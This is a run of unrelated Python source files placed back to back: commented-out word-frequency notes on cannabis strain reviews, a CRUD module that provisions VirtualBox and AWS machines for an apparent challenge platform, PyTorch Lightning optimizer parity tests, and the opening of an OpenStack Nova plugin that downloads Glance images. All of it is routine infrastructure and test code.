top_words_set | set(words) # top_words[i] = words # word_list.extend(words) # # word_counter = Counter(word_list) # # # try lemmatization # top_words = {} # top_words_set = set() # word_list = [] # for i in range(num_factors): # words = nl.get_top_words_lemmatize(prod_group_dfs[i], 50) # top_words_set = top_words_set | set(words) # top_words[i] = words # word_list.extend(words) # # word_counter = Counter(word_list) ''' gave this: ({u'also': 19, u'always': 1, u'anxiety': 20, u'atf': 1, u'awesome': 19, u'back': 2, u'beautiful': 1, u'bit': 1, u'blackberry': 1, u'blueberry': 1, u'body': 20, u'bubba': 1, u'bud': 20, u'buzz': 19, u'cheese': 2, u'chemdawg': 1, u'couch': 10, u'crack': 1, u'day': 20, u'definitely': 20, u'diesel': 1, u'earthy': 2, u'effect': 20, u'energetic': 3, u'energy': 1, u'euphoric': 13, u'ever': 20, u'far': 1, u'feel': 20, u'feeling': 20, u'felt': 14, u'first': 20, u'flavor': 20, u'fruity': 1, u'gdp': 1, u'get': 20, u'give': 18, u'go': 19, u'got': 20, u'green': 1, u'gsc': 1, u'ha': 20, u'haze': 2, u'headband': 1, u'heavy': 14, u'help': 7, u'hit': 20, u'hybrid': 1, u'indica': 20, u'insomnia': 1, u'jack': 1, u'kush': 8, u'lemon': 4, u'little': 19, u'long': 20, u'made': 19, u'make': 20, u'mellow': 14, u'much': 20, u'night': 15, u'og': 3, u'one': 20, u'orange': 1, u'perfect': 20, u'pineapple': 1, u'potent': 8, u'pretty': 20, u'purple': 2, u'recommend': 20, u'relaxed': 20, u'relief': 5, u'right': 2, u'sativa': 20, u'shit': 6, u'smoked': 20, u'smoking': 18, u'smooth': 20, u'still': 8, u'stress': 2, u'stuff': 20, u'super': 20, u'tasty': 1, u'top': 5, u'uplifting': 15, u'wa': 20, u'weed': 19, u'well': 20, u'white': 1, u'widow': 1, u'would': 20}) words to use for feeling: uplifting, mellow, euphoric, euphoria, energy, energetic, relief words to use for taste: potent, pineapple, orange, lemon, earthy, diesel, blackberry, blueberry, cherry, banana words to use for conditions: insomnia, stress, headache, depression, anxiety words to use for effects: body, couch, mellow, focus, focused, cerebral times: daytime, night words to include in stoplist: weed, wa, well, white, widow, would, tasty, top, stuff, super, still, smooth, smoked, smoking, shit, sativa, right, relaxed, recommend, purple, pretty, og, one, perfect, far, feel, feeling, first, flavor, long, made, make, mellow, much, night, little, kush, jack, indica, hybrid, hit, help, heavy, headband, haze, ha, gsc, green, got, go, give, get, gdp, ever, always, atf, awesome, beautiful, bit, bubba, bud, buzz, chemdawg, crack, definitely, effect ''' # try bigrams # top_words = {} # top_words_set = set() # word_list = [] # for i in range(num_factors): # words = nl.get_top_bigrams(prod_group_dfs[i]) # top_words_set = top_words_set | set(words) # top_words[i] = words # word_list.extend(words) # # word_counter = Counter(word_list) # # # get strain list so we can exclude it from bigrams # strains = sl.load_current_strains(correct_names=True) # strains_split = [s.split('/') for s in strains] # strain_info = [(s[1].lower(), s[2].lower(), re.sub('-', ' ', s[2].lower())) for s in strains_split] # # maps strain to category (hybrid, indica, sativa, edible) in each group # strain_cat_dict = {} # for s in strain_info: # strain_cat_dict[s[1]] = s[0] # # # get % of each type (hybrid, indica, sativa, edible) in each group # prod_group_pcts = {} # for p in prod_group_dfs: # temp_df = prod_group_dfs[p] # temp_df['category'] = temp_df['product'].map(lambda x: strain_cat_dict[x]) # prod_group_dfs[p] = temp_df # cat_val_counts_p = 
prod_group_dfs[p]['category'].value_counts() # prod_group_pcts[p] = [round(float(c)/prod_group_dfs[p].shape[0]*100, 2) for c in cat_val_counts_p] # prod_group_pcts[p] = pd.Series(data=prod_group_pcts[p], index=cat_val_counts_p.index) # # # # get % of each type overall # full_df['category'] = full_df['product'].map(lambda x: strain_cat_dict[x]) # cat_val_counts = full_df['category'].value_counts() # print cat_val_counts # cat_val_pct = [round(float(c)/full_df.shape[0]*100, 2) for c in cat_val_counts] # cat_val_pct = pd.Series(data=cat_val_pct, index=cat_val_counts.index) # # print top_words_set # without any stopwords: [u'good', u'pain', # u'taste', u'high', u'strain', u'love', u'best', u'really', u'great', # u'like', u'favorite', u'smoke', u'time', u'smell', u'nice'] #crud.py from typing import List from sqlalchemy.orm import Session from exceptions import ComponentInfoAlreadyExistError, ComponentInfoNotFoundError, NoComponentsSelected from models import componentsInfo, usersInfo from schemas import CreateAndUpdateComponent, Creation import vagrant import os import boto3 import json import virtualbox import subprocess import enum import time class machineStates(enum.Enum): #for VB states Null = 0 PoweredOff = 1 Saved = 2 Teleported = 3 Aborted = 4 Running = 5 Paused = 6 Stuck = 7 Teleporting = 8 LiveSnapshotting = 9 Starting = 10 Stopping = 11 Saving = 12 Restoring = 13 # Function to get list of components info def get_all_components(session: Session, _username: str) -> List[componentsInfo]: component_info = session.query(componentsInfo).filter_by(username=_username).all() if component_info is None: raise ComponentInfoNotFoundError return component_info # Function to get info of a particular component def get_component_info_by_component_id(session: Session, _username: str, _componentname: str) -> componentsInfo: component_info = session.query(componentsInfo).filter_by(username=_username, hostname=_componentname).first() #component_info = session.query(componentsInfo).get(_componentname) if component_info is None: raise ComponentInfoNotFoundError return component_info # Function to add a new component info to the database def create_component(session: Session, _username: str, components: Creation) -> componentsInfo: # Check for no component selected if components.dashboard == False and components.webpage == False and components.challenge == False and components.monitoring == False: raise NoComponentsSelected # Check if the names given have duplicates are not and if the names are in the database or not if yes go error, no then cont. 
if components.dashboard == True: if components.dashboard_name == components.webpage_name or components.dashboard_name == components.challenge_name or components.dashboard_name == components.monitoring_name: raise ComponentInfoAlreadyExistError component_details = session.query(componentsInfo).filter( componentsInfo.hostname == components.dashboard_name, componentsInfo.username == _username).first() if component_details is not None: raise ComponentInfoAlreadyExistError if components.webpage == True: if components.webpage_name == components.challenge_name or components.webpage_name == components.monitoring_name: raise ComponentInfoAlreadyExistError component_details = session.query(componentsInfo).filter( componentsInfo.hostname == components.webpage_name, componentsInfo.username == _username).first() if component_details is not None: raise ComponentInfoAlreadyExistError if components.challenge == True: if components.challenge_name == components.monitoring_name: raise ComponentInfoAlreadyExistError component_details = session.query(componentsInfo).filter( componentsInfo.hostname == components.challenge_name, componentsInfo.username == _username).first() if component_details is not None: raise ComponentInfoAlreadyExistError if components.monitoring == True: component_details = session.query(componentsInfo).filter( componentsInfo.hostname == components.monitoring_name, componentsInfo.username == _username).first() if component_details is not None: raise ComponentInfoAlreadyExistError # Create the json file for vagrantfile jsconfig = [ { "provision": components.dashboard, "hostname": components.dashboard_name, "resource": components.dashboard_resource, "type": "dashboard" }, { "provision": components.webpage, "hostname": components.webpage_name, "resource": components.webpage_resource, "type": "webpage" }, { "provision": components.challenge, "hostname": components.challenge_name, "resource": components.challenge_resource, "type": "challenge" }, { "provision": components.monitoring, "hostname": components.monitoring_name, "resource": components.monitoring_resource, "type": "monitoring" } ] # Serializing json json_object = json.dumps(jsconfig, indent = 4) # Writing to sample.json with open("sample.json", "w") as outfile: outfile.write(json_object) # Vagrant up to create the machines vagrantfilepath = os.path.join("config") v = vagrant.Vagrant(vagrantfilepath, quiet_stdout=False) v.up() # For creating an vb instance based on vagrantfile # Connect to EC2 ec2 = boto3.resource('ec2') # Connect to vbox vbox = virtualbox.VirtualBox() # Get info into the database for each component accepted if components.dashboard == True and components.dashboard_resource == "virtualbox": # Get the machine to receive the machine state and machine IPv4 and OS vm = vbox.find_machine(components.dashboard_name) dashboard_state = machineStates(vm.state).name time.sleep(30) dashboard_box = subprocess.run(["VBoxManage", "guestproperty", "get", components.dashboard_name, "/VirtualBox/HostInfo/VBoxVerExt"], capture_output=True, text=True).stdout dashboard_ip = subprocess.run(["VBoxManage", "guestproperty", "get", components.dashboard_name, "/VirtualBox/GuestInfo/Net/1/V4/IP"], capture_output=True, text=True).stdout dashboard_box = dashboard_box.split() dashboard_ip = dashboard_ip.split() dashboard_box = dashboard_box[1] dashboard_ip = dashboard_ip[1] #add the component into the database new_component_info = componentsInfo(username = _username, type = "dashboard", resource = components.dashboard_resource, hostname = 
components.dashboard_name, URL_access = dashboard_ip, state = dashboard_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) elif components.dashboard == True and components.dashboard_resource == "aws": # Get the machine to receive the machine state and machine IPv4 and OS # Get information for specfic instance current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[components.dashboard_name]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance data dashboard_ip = instance.public_ip_address dashboard_storage = instance.instance_type dashboard_box = instance.platform_details dashboard_state = instance.state['Name'] #add the component into the database new_component_info = componentsInfo(username = _username, type = "dashboard", resource = components.dashboard_resource, hostname = components.dashboard_name, URL_access = dashboard_ip, state = dashboard_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) if components.webpage == True and components.webpage_resource == "virtualbox": # Get the machine to receive the machine state and machine IPv4 and OS vm = vbox.find_machine(components.webpage_name) webpage_state = machineStates(vm.state).name time.sleep(30) webpage_box = subprocess.run(["VBoxManage", "guestproperty", "get", components.webpage_name, "/VirtualBox/HostInfo/VBoxVerExt"], capture_output=True, text=True).stdout webpage_ip = subprocess.run(["VBoxManage", "guestproperty", "get", components.webpage_name, "/VirtualBox/GuestInfo/Net/1/V4/IP"], capture_output=True, text=True).stdout webpage_box = webpage_box.split() webpage_ip = webpage_ip.split() webpage_box = webpage_box[1] webpage_ip = webpage_ip[1] #add the component into the database new_component_info = componentsInfo(username = _username, type = "webpage", resource = components.webpage_resource, hostname = components.webpage_name, URL_access = webpage_ip, state = webpage_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) elif components.webpage == True and components.webpage_resource == "aws": # Get the machine to receive the machine state and machine IPv4 and OS # Get information for specfic instance current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[components.webpage_name]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance data webpage_ip = instance.public_ip_address webpage_storage = instance.instance_type webpage_box = instance.platform_details webpage_state = instance.state['Name'] #add the component into the database new_component_info = componentsInfo(username = _username, type = "webpage", resource = components.webpage_resource, hostname = components.webpage_name, URL_access = webpage_ip, state = webpage_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) if components.challenge == True and components.challenge_resource == "virtualbox": # Get the machine to receive the machine state and machine IPv4 and OS vm = vbox.find_machine(components.challenge_name) challenge_state = machineStates(vm.state).name time.sleep(30) challenge_box = subprocess.run(["VBoxManage", "guestproperty", "get", components.challenge_name, "/VirtualBox/HostInfo/VBoxVerExt"], capture_output=True, text=True).stdout challenge_ip = subprocess.run(["VBoxManage", "guestproperty", "get", 
components.challenge_name, "/VirtualBox/GuestInfo/Net/1/V4/IP"], capture_output=True, text=True).stdout challenge_box = challenge_box.split() challenge_ip = challenge_ip.split() challenge_box = challenge_box[1] challenge_ip = challenge_ip[1] #add the component into the database new_component_info = componentsInfo(username = _username, type = "challenge", resource = components.challenge_resource, hostname = components.challenge_name, URL_access = challenge_ip, state = challenge_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) elif components.challenge == True and components.challenge_resource == "aws": # Get the machine to receive the machine state and machine IPv4 and OS # Get information for specfic instance current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[components.challenge_name]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance data challenge_ip = instance.public_ip_address challenge_storage = instance.instance_type challenge_box = instance.platform_details challenge_state = instance.state['Name'] #add the component into the database new_component_info = componentsInfo(username = _username, type = "challenge", resource = components.challenge_resource, hostname = components.challenge_name, URL_access = challenge_ip, state = challenge_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) if components.monitoring == True and components.monitoring_resource == "virtualbox": # Get the machine to receive the machine state and machine IPv4 and OS vm = vbox.find_machine(components.monitoring_name) monitoring_state = machineStates(vm.state).name time.sleep(30) monitoring_box = subprocess.run(["VBoxManage", "guestproperty", "get", components.monitoring_name, "/VirtualBox/HostInfo/VBoxVerExt"], capture_output=True, text=True).stdout monitoring_ip = subprocess.run(["VBoxManage", "guestproperty", "get", components.monitoring_name, "/VirtualBox/GuestInfo/Net/1/V4/IP"], capture_output=True, text=True).stdout monitoring_box = monitoring_box.split() monitoring_ip = monitoring_ip.split() monitoring_box = monitoring_box[1] monitoring_ip = monitoring_ip[1] #add the component into the database new_component_info = componentsInfo(username = _username, type = "monitoring", resource = components.monitoring_resource, hostname = components.monitoring_name, URL_access = monitoring_ip, state = monitoring_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) elif components.monitoring == True and components.monitoring_resource == "aws": # Get the machine to receive the machine state and machine IPv4 and OS # Get information for specfic instance current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[components.monitoring_name]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance data monitoring_ip = instance.public_ip_address monitoring_storage = instance.instance_type monitoring_box = instance.platform_details monitoring_state = instance.state['Name'] #add the component into the database new_component_info = componentsInfo(username = _username, type = "monitoring", resource = components.monitoring_resource, hostname = components.monitoring_name, URL_access = monitoring_ip, state = monitoring_state) session.add(new_component_info) session.commit() session.refresh(new_component_info) return 
{"message": "Provisoning Components"} # Function to update details of the component def update_component_info(session: Session, _username: str, _componentname: str, _getstate: str): component_info = get_component_info_by_component_id(session, _username, _componentname) if component_info is None: raise ComponentInfoNotFoundError # Connect to EC2 ec2 = boto3.resource('ec2') # Connect to vbox vbox = virtualbox.VirtualBox() # Vb update for state if component_info.resource == "virtualbox": # Check if stopping if _getstate == "stop": # Stop the vb machine subprocess.run(["VBoxManage", "controlvm", _componentname, "pause"], shell = False) # For stopping an vb instance # Get the machine to receive the new machine state vm = vbox.find_machine(_componentname) vbmachine_state = machineStates(vm.state).name component_info.state = vbmachine_state session.commit() session.refresh(component_info) # Check if starting elif _getstate == "start": #Start the vb machine subprocess.run(["VBoxManage", "controlvm", _componentname, "resume"], shell = False) # For starting an vb instance # Get the machine to receive the new machine state vm = vbox.find_machine(_componentname) vbmachine_state = machineStates(vm.state).name component_info.state = vbmachine_state session.commit() session.refresh(component_info) # Aws update for state elif component_info.resource == "aws": # Check if starting if _getstate == "stop": #Stop the aws machine ec2 = boto3.resource('ec2') ec2.instances.filter(Filters=[{ "Name": "tag:Name", "Values": [_componentname]}, ]).stop() # For halting an specfic ec2 instance time.sleep(40) current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[_componentname]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance state awsmachine_state = instance.state['Name'] component_info.state = awsmachine_state session.commit() session.refresh(component_info) elif _getstate == "start": #Start the aws machine ec2 = boto3.resource('ec2') ec2.instances.filter(Filters=[{ "Name": "tag:Name", "Values": [_componentname]}, ]).start() # For starting an specfic ec2 instance time.sleep(40) current_instances = ec2.instances.filter(Filters=[ {"Name": "tag:Name", "Values":[_componentname]}]) for instance in current_instances: for tag in instance.tags: if 'Name'in tag['Key']: name = tag['Value'] # Get the instance state awsmachine_state = instance.state['Name'] component_info.state = awsmachine_state session.commit() session.refresh(component_info) return component_info # Function to delete a component info from the db def delete_component_info(session: Session, _username: str, _componentname: str): component_info = get_component_info_by_component_id(session, _username, _componentname) if component_info is None: raise ComponentInfoNotFoundError # Connect to EC2 ec2 = boto3.resource('ec2') # Connect to vbox vbox = virtualbox.VirtualBox() # Delete for vb if component_info.resource == "virtualbox": vm = vbox.find_machine(_componentname) vm.remove(delete=True) # For destroying an vb instance session.delete(component_info) session.commit() message = {"message": "{} VB Instance Destroyed.".format(_componentname)} # Delete for aws elif component_info.resource == "aws": ec2.instances.filter(Filters=[{ "Name": "tag:Name", "Values": [_componentname]}]).terminate() # For terminating an specfic ec2 instance session.delete(component_info) session.commit() message = {"message": "{} AWS Instance Destroyed.".format(_componentname)} return message 
# Copyright The PyTorch Lightning team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from collections import Callable from copy import deepcopy from typing import Optional from unittest.mock import patch import numpy as np import pytest import torch from torch.optim import Optimizer import pytorch_lightning as pl from pytorch_lightning import seed_everything, Trainer from pytorch_lightning.callbacks import ModelCheckpoint from pytorch_lightning.core.optimizer import LightningOptimizer from tests.base.boring_model import BoringModel # TODO: # For both automatic / manual optimization # - Test dp, ddp, ddp2 # - Apex # - Random accumulated_grad_batches (bug) # - Multiple optimizers class BaseParityAutomaticOptimizationModel(BoringModel): def __init__( self, optimizer_cls, optimizer_is_mocked=False, accumulate_grad_batches=None, lr=0.1 ): super().__init__() self.optimizer_cls = optimizer_cls self.losses = [] self.grads = [] self.on_before_zero_grad_count = 0 self.optimizer_is_mocked = optimizer_is_mocked self.grad_checked = False self.accumulate_grad_batches = accumulate_grad_batches self.lr = lr def on_before_zero_grad(self, optimizer): self.on_before_zero_grad_count += 1 if self.layer.weight.grad is not None: self.grads.append(self.layer.weight.grad.clone()) def configure_optimizers(self): optimizer = self.optimizer_cls(self.layer.parameters(), lr=self.lr) assert isinstance(optimizer, Optimizer) return optimizer def training_step(self, batch, batch_idx): output = self.layer(batch) loss = self.loss(batch, output) self.losses.append(loss.detach().item()) return {"loss": loss} class AutomaticOptimizationPurePytorchOptimizerModel(BaseParityAutomaticOptimizationModel): def training_step(self, batch, batch_idx): output = self.layer(batch) loss = self.loss(batch, output) self.losses.append(loss.detach().item()) loss /= float(self.accumulate_grad_batches) return {"loss": loss} def optimizer_step( self, epoch: int = None, batch_idx: int = None, optimizer: Optimizer = None, optimizer_idx: int = None, optimizer_closure: Optional[Callable] = None, on_tpu: bool = None, using_native_amp: bool = None, using_lbfgs: bool = None, ) -> None: """ Override the optimizer step to define manual optimizer steps, as we use LightningOptimizer wrapper as standard """ # Get the unwrapped optimizer optimizer = optimizer.optimizer assert not isinstance(optimizer, LightningOptimizer) optimizer_closure() assert self.trainer.accumulate_grad_batches == 1 if should_accumulate(self.trainer, self.accumulate_grad_batches): return self.grad_checked = True assert torch.abs(self.layer.weight.grad).sum() > 0 optimizer.step() self.on_before_zero_grad_count += 1 optimizer.zero_grad() if not self.optimizer_is_mocked: assert torch.abs(self.layer.weight.grad).sum() == 0 class AutomaticOptimizationPurePytorchAMPOptimizerModel(BaseParityAutomaticOptimizationModel): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.scaler = torch.cuda.amp.GradScaler() def training_step(self, batch, batch_idx): with torch.cuda.amp.autocast(): 
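# (forward pass and loss are computed under autocast; below, the loss is divided by
#  accumulate_grad_batches and passed through GradScaler so this hand-written AMP loop stays
#  comparable to the Lightning-managed path it is tested against)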
output = self.layer(batch) loss = self.loss(batch, output) self.losses.append(loss.detach().item()) loss /= float(self.accumulate_grad_batches) loss = self.scaler.scale(loss) return {"loss": loss} def optimizer_step( self, epoch: int = None, batch_idx: int = None, optimizer: Optimizer = None, optimizer_idx: int = None, optimizer_closure: Optional[Callable] = None, on_tpu: bool = None, using_native_amp: bool = None, using_lbfgs: bool = None, ) -> None: """ Override the optimizer step to define manual optimizer steps, as we use LightningOptimizer wrapper as standard """ # Get the unwrapped optimizer optimizer = optimizer.optimizer assert not isinstance(optimizer, LightningOptimizer) optimizer_closure() assert self.trainer.accumulate_grad_batches == 1 if should_accumulate(self.trainer, self.accumulate_grad_batches): return self.scaler.unscale_(optimizer) self.grad_checked = True assert torch.abs(self.layer.weight.grad).sum() > 0 self.scaler.step(optimizer) self.scaler.update() self.on_before_zero_grad_count += 1 optimizer.zero_grad() if not self.optimizer_is_mocked: assert torch.abs(self.layer.weight.grad).sum() == 0 def should_accumulate(trainer, accumulate_grad_batches): accumulation_done = (trainer.batch_idx + 1) == trainer.num_training_batches is_final_batch = (trainer.batch_idx + 1) % accumulate_grad_batches == 0 return not (accumulation_done or is_final_batch) @pytest.mark.parametrize(["precision", "amp_backend", "gpus"], [ pytest.param(32, "native", 0), pytest.param(16, "native", 1, marks=pytest.mark.skipif(not torch.cuda.is_available(), reason='Requires GPU')), ]) @pytest.mark.parametrize('accumulate_grad_batches', [1, 7]) def test_lightning_optimizer_and_no_lightning_optimizer_equality( tmpdir, precision, amp_backend, gpus, accumulate_grad_batches, ): if accumulate_grad_batches > 1: accumulate_grad_batches = np.random.randint(1, accumulate_grad_batches) vanilla_model_cls = AutomaticOptimizationPurePytorchAMPOptimizerModel if precision == 16 \ else AutomaticOptimizationPurePytorchOptimizerModel run_lightning_optimizer_equality( BaseParityAutomaticOptimizationModel, vanilla_model_cls, precision=precision, default_root_dir=tmpdir, max_epochs=1, limit_train_batches=5, accumulate_grad_batches=accumulate_grad_batches, amp_backend=amp_backend, gpus=gpus ) @pytest.mark.parametrize(["precision", "amp_backend", "gpus"], [ pytest.param(32, "native", 0), ]) @pytest.mark.parametrize('accumulate_grad_batches', [1]) def test_lightning_optimizer_and_no_lightning_optimizer_equality_check_optim_calls( tmpdir, precision, amp_backend, gpus, accumulate_grad_batches, ): vanilla_model_cls = AutomaticOptimizationPurePytorchAMPOptimizerModel if precision == 16 \ else AutomaticOptimizationPurePytorchOptimizerModel with patch("torch.optim.SGD.step") as mock_sgd_step, \ patch("torch.optim.Adam.step") as mock_adam_step, \ patch("torch.optim.SGD.zero_grad") as mock_sgd_zero_grad, \ patch("torch.optim.Adam.zero_grad") as mock_adam_zero_grad: max_epochs = 2 limit_train_batches = 10 # Run equality test using Lightning Optimizer run_lightning_optimizer_equality( BaseParityAutomaticOptimizationModel, vanilla_model_cls, default_root_dir=tmpdir, optimizer_is_mocked=True, accumulate_grad_batches=accumulate_grad_batches, max_epochs=max_epochs, limit_train_batches=limit_train_batches, amp_backend=amp_backend, precision=precision, gpus=gpus ) expected_num_batches = max_epochs * limit_train_batches assert mock_sgd_step.call_count == (expected_num_batches // accumulate_grad_batches) assert mock_sgd_zero_grad.call_count == 
(expected_num_batches // accumulate_grad_batches) assert mock_sgd_step.call_count == mock_adam_step.call_count assert mock_sgd_step.call_count == mock_adam_step.call_count def train_with_restore(tmpdir, model_cls, restore_from=None): # init model if restore_from is not None: seed_everything(42) model = model_cls(torch.optim.Adam, accumulate_grad_batches=1, lr=10e-1) ckpt_saver = ModelCheckpoint(dirpath=f"{tmpdir}/mckpt", save_last=True, save_weights_only=False) # Initialize a trainer trainer = pl.Trainer( default_root_dir=tmpdir, max_epochs=(1 + bool(restore_from)), limit_train_batches=8, callbacks=([ckpt_saver] if restore_from is None else []), checkpoint_callback=(not restore_from), resume_from_checkpoint=restore_from, num_sanity_val_steps=0, ) # Train the model trainer.fit(model) return ckpt_saver.best_model_path, model def test_parity_checkpointing(tmpdir): """ This test assert that reloading a checkpoint and finetunning gives the same result with / without LightningOptimizer """ # Initial train run of the model. seed_everything(0) ckpt_path, first_epoch_pl_optimizer_model = train_with_restore( tmpdir, model_cls=BaseParityAutomaticOptimizationModel, restore_from=None) assert "last" in ckpt_path _, second_epoch_pl_optimizer_model = train_with_restore( tmpdir, model_cls=BaseParityAutomaticOptimizationModel, restore_from=ckpt_path) seed_everything(0) ckpt_path, first_epoch_pure_pytorch_optimizer_model = train_with_restore( tmpdir, model_cls=AutomaticOptimizationPurePytorchOptimizerModel, restore_from=None) _, second_epoch_pure_pytorch_optimizer_model = train_with_restore( tmpdir, model_cls=AutomaticOptimizationPurePytorchOptimizerModel, restore_from=ckpt_path) assert first_epoch_pl_optimizer_model.losses == first_epoch_pure_pytorch_optimizer_model.losses assert second_epoch_pl_optimizer_model.losses == second_epoch_pure_pytorch_optimizer_model.losses def run_lightning_optimizer_equality( lightning_model_cls, vanilla_model_cls, optimizer_is_mocked=False, **trainer_kwargs, ): trainer_kwargs = { "limit_val_batches": 0, **trainer_kwargs } expected_num_batches = trainer_kwargs["max_epochs"] * trainer_kwargs["limit_train_batches"] accumulate_grad_batches = trainer_kwargs["accumulate_grad_batches"] pl_optimizer_initial_model_weights, pl_optimizer_model = train_specific_optimizer_model( lightning_model_cls, torch.optim.SGD, expected_num_batches=expected_num_batches, optimizer_is_mocked=optimizer_is_mocked, **trainer_kwargs, ) pure_pytorch_optimizer_initial_model_weights, pure_pytorch_optimizer_model = train_specific_optimizer_model( vanilla_model_cls, torch.optim.Adam if optimizer_is_mocked else torch.optim.SGD, expected_num_batches=expected_num_batches, optimizer_is_mocked=optimizer_is_mocked, replace_optimizer_step_with_pure_pytorch=True, **trainer_kwargs, ) if not optimizer_is_mocked: assert_model_equality( pl_optimizer_initial_model_weights=pl_optimizer_initial_model_weights, pl_optimizer_model=pl_optimizer_model, pure_pytorch_optimizer_initial_model_weights=pure_pytorch_optimizer_initial_model_weights, pure_pytorch_optimizer_model=pure_pytorch_optimizer_model, expected_num_batches=expected_num_batches, precision=trainer_kwargs["precision"] ) def assert_model_equality( pl_optimizer_initial_model_weights, pl_optimizer_model, pure_pytorch_optimizer_initial_model_weights, pure_pytorch_optimizer_model, expected_num_batches, precision, ): assert torch.equal(pl_optimizer_initial_model_weights, pure_pytorch_optimizer_initial_model_weights) assert len(pl_optimizer_model.losses) == 
expected_num_batches assert pure_pytorch_optimizer_model.grad_checked assert not torch.isnan(torch.FloatTensor(pl_optimizer_model.losses)).any() for pytorch_grad, pl_optim_grad in zip(pure_pytorch_optimizer_model.grads, pl_optimizer_model.grads): assert torch.equal(pytorch_grad, pl_optim_grad), 'Grad parameters are different' for pytorch_weight, pl_optim_weight in zip(pure_pytorch_optimizer_model.parameters(), pl_optimizer_model.parameters()): assert torch.equal(pytorch_weight, pl_optim_weight), 'Model parameters are different' # train function def train_specific_optimizer_model( model_cls, optimizer_cls, expected_num_batches, optimizer_is_mocked=False, replace_optimizer_step_with_pure_pytorch=False, **trainer_kwargs, ): seed_everything(42) trainer_kwargs = deepcopy(trainer_kwargs) model = model_cls( optimizer_cls=optimizer_cls, optimizer_is_mocked=optimizer_is_mocked, accumulate_grad_batches=trainer_kwargs["accumulate_grad_batches"], ) if replace_optimizer_step_with_pure_pytorch: # When running pure vanilla training, accumulate_grad_batches should be 1. trainer_kwargs["accumulate_grad_batches"] = 1 trainer_kwargs["precision"] = 32 expected_global_step = expected_num_batches // trainer_kwargs["accumulate_grad_batches"] initial_weights = model.layer.weight.clone() model.training_epoch_end = None trainer = Trainer( **trainer_kwargs ) trainer.fit(model) assert np.abs(trainer.global_step - expected_global_step) <= 2 return initial_weights, model #!/usr/bin/env python # Copyright (c) 2012 OpenStack Foundation # Copyright (c) 2010 Citrix Systems, Inc. # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # NOTE: XenServer still only supports Python 2.4 in it's dom0 userspace # which means the Nova xenapi plugins must use only Python 2.4 features # TODO(sfinucan): Resolve all 'noqa' items once the above is no longer true """Handle the uploading and downloading of images via Glance.""" try: import httplib except ImportError: from six.moves import http_client as httplib try: import json except ImportError: import simplejson as json import md5 # noqa import socket import urllib2 from urlparse import urlparse import pluginlib_nova import utils pluginlib_nova.configure_logging('glance') logging = pluginlib_nova.logging PluginError = pluginlib_nova.PluginError SOCKET_TIMEOUT_SECONDS = 90 class RetryableError(Exception): pass def _create_connection(scheme, netloc): if scheme == 'https': conn = httplib.HTTPSConnection(netloc) else: conn = httplib.HTTPConnection(netloc) conn.connect() return conn def _download_tarball_and_verify(request, staging_path): # NOTE(johngarbutt) By default, there is no timeout. # To ensure the script does not hang if we lose connection # to glance, we add this socket timeout. # This is here so there is no chance the timeout out has # been adjusted by other library calls. 
socket.setdefaulttimeout(SOCKET_TIMEOUT_SECONDS) try: response = urllib2.urlopen(request) except urllib2.HTTPError, error: # noqa raise RetryableError(error) except urllib2.URLError, error: # noqa raise RetryableError(error) except httplib.HTTPException, error: # noqa # httplib.HTTPException and derivatives (BadStatusLine in particular) # don't have a useful __repr__ or __str__ raise RetryableError('%s: %s' % (error.__class__.__name__, error)) url = request.get_full_url() logging.info("Reading image data from %s" % url) callback_data = {'bytes_read': 0} checksum = md5.new() def update_md5(chunk): callback_data['bytes_read'] += len(chunk) checksum.update(chunk) try: try: utils.extract_tarball(response, staging_path, callback=update_md5) except Exception, error: # noqa raise RetryableError(error) finally: bytes_read = callback_data['bytes_read'] logging.info("Read %d bytes from %s", bytes_read, url) # Use ETag if available, otherwise content-md5(v2) or # X-Image-Meta-Checksum(v1) etag = response.info().getheader('etag', None) if etag is None: etag = response.info().getheader('content-md5', None) if etag is None: etag = response.info().getheader('x-image-meta-checksum', None) # Verify checksum using ETag checksum = checksum.hexdigest() if etag is None: msg = "No ETag found for comparison to checksum %(checksum)s" logging.info(msg % {'checksum': checksum}) elif checksum != etag: msg = 'ETag %(etag)s does not match computed md5sum %(checksum)s' raise RetryableError(msg % {'checksum': checksum, 'etag': etag}) else: msg = "Verified image checksum %(checksum)s" logging.info(msg % {'checksum': checksum}) def _download_tarball_v1(sr_path, staging_path, image_id, glance_host, glance_port, glance_use_ssl, extra_headers): """Download the tarball image from Glance v1 and extract it into the staging area. Retry if there is any failure. """ if glance_use_ssl: scheme = 'https' else: scheme = 'http' endpoint = "%(scheme)s://%(glance_host)s:%(glance_port)d" % { 'scheme': scheme, 'glance_host': glance_host, 'glance_port': glance_port} 